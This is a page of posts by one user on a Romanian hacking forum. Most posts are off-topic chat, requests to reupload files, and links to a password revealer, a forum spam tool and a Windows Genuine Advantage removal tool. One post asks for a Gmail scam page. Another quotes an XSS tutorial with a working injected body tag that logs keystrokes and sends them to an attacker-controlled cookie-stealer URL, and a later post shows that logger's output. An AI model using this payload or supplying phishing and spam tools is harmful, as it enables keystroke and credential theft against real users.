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Everything posted by hfhun

  1. Ce as vrea sa fiu in locul tau! La mine muncitorii din fata casei fac strazile si bordurile, iar cei din spate reconstruiesc o casa. Si asta incepe pe la 7 dimineata, si se mai termina seara. Iar astia din fata casei vin si cu tot felu de masinarii care mai de care mai zgomotoase. Bine ca au trecut din fata casei mele, ca tremura patu` cu mine cand ma trezeam Si chestia asta tine de aproximativ o luna, si pare ca mai dureaza destul de mult.
  2. E posibil sa aiba optiunea Remember my ID&Password activata, nu cred ca merge daca este asa.
  3. hfhun


  4. Un astfel de program este si SnadBoy's Revelation: http://www.snadboy.com/RevelationV2.zip
  5. http://rapidshare.com/files/26851814/UC_Forum_Spam.rar.html
  6. Uitati si un program care scoate WGA din computer: http://rapidshare.com/files/26672833/remove_wga.rar.html
  7. Asta este tutorialul complet: XSS attacks are often looked at as puny or ineffective, being only a matter of being able to steal cookies, or pop up annoying boxes. You can also rewrite certain values in the HTML DOM. But XSS attacks are even more dangerous than that, and this is a perfect example of how. First, I will give you the code to inject, then I will explain it step by step. <body onload=key="" onkeypress=if(event.which){key=key+String.fromCharCode(event.which)}else{key=key+String.fromCharCode(event.keyCode) onunload=window.location="http://www.attacker.com/cookiestealer.php?cookie="> It's a body tag, so whatever in the body is typed in, essentially anything on the page, will be logged. When the page loads, it initializes the variable "key". When a key is pressed, it finds whether the browser uses event.which (netscape-compatible) or event.keyCode (IE compatible) and converts the ASCII value of the key pressed to its character, then adds it to the end of the variable "key". When the page is unloaded (that is, the browser window is closed or a new page is loaded, it sends the browser to a new location, namely your logging program.
  8. Shinedown - 45 daca suntem tot offtopic. am si eu o intrebare. am incercat si eu sa fac un topic nou la sectiunea asta. dar ma redirectioneaza spre o pagina cu .. injuraturi .. si cica asta nu e hacking challenge. ce am facut? era pur si simplu un link.
  9. nu mai merge linkul.. ..puteti sa-l mai uploadati odata pls? :@
  10. nu merge programul. intreaba acea persoana daca ma lasa sa o pun pe lista :@ am incercat pe mine
  11. ceva pentru gmail stii? sau un scam page..ceva..
  12. reupload pls
  13. aceeasi problema ca asrbasdf o am si eu.. Rst-Crew [url]http://www.rst-crew.net[/url] Date: Saturday, October 28, 2006, 9:41 pm Cookie: Rst-Crew [url]http://www.rst-crew.net[/url] p.s. php-ul e uploadat pe lx
  14. il mai poti uploada odata? chiar as avea nevoie.
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